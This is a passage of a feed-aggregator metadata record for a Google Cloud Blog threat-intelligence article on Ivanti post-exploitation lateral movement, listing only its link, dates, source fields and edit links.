"link"=>"https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement/",
"published_date"=>Thu, 04 Apr 2024 14:00:00.000000000 UTC +00:00,
"image_url"=>nil,
"feed_url"=>"https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement/",
"language"=>nil,
"active"=>true,
"ricc_source"=>"feedjira::v1",
"created_at"=>Fri, 05 Apr 2024 08:04:28.771137000 UTC +00:00,
"updated_at"=>Tue, 14 May 2024 05:25:09.169004000 UTC +00:00,
"newspaper"=>"Google Cloud Blog",
"macro_region"=>"Technology"}
Edit this article
Back to articles